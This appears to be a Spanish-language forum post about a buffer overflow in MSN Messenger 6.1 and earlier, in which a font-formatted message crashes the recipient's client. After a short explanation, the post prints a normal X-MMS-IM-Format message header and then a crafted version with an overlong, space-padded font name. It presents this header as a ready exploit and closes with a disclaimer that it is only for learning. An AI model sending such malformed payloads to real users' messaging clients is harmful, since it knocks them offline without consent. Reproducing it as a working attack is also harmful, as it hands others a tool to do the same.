Hace poco (dos o tres semanas) se descubrió una falla de seguridad en el Msn. Ya se ha pedido a todos los usuarios que actualicen su msn. Aún así hay gente que no lo ha hecho. Esta falla afecta a los usuarios de la versión 6.1 hacia abajo y ha aparecido junto a otra falla que permitiría la ejecución de programas en el pc de la víctima.
Pongo aquí el exploit del fallo primero, que provoca la caída del usuario que lo recibe. El bug consiste en hacer un desbordamiento de buffer al enviar un mensaje con fuente formateada, al enviarle una cadena larga que provoca el desbordamiento y la caida del msn atacado.
Lo explico más detenidamente:Este es el encabezado normal de envio de mensajes:
Código:
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=MS%20Sans%20Serif; EF=B; CO=ff; CS=0;
PF=22
Esto indica que el mensaje tiene vuestro tipo de letra y color.Donde está la falla en el programa si le metes una cadena larga como esta:
Código:
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
X-MMS-IM-Format: FN=Times%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
%20%20%20%20%20%20%20%20%20%20%20%20New%20
%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2
0%20%20%20%20%20Roman%20%20%20%20%20%20%20%20%2
0%20%20; EF=B; CO=ff; CS=0; PF=22
Lo aquí expuesto es para el conocimiento de los demás, no para su explotación y provecho. En resumen: Sólo para aprender y adquirir conocimiento, no para perrear.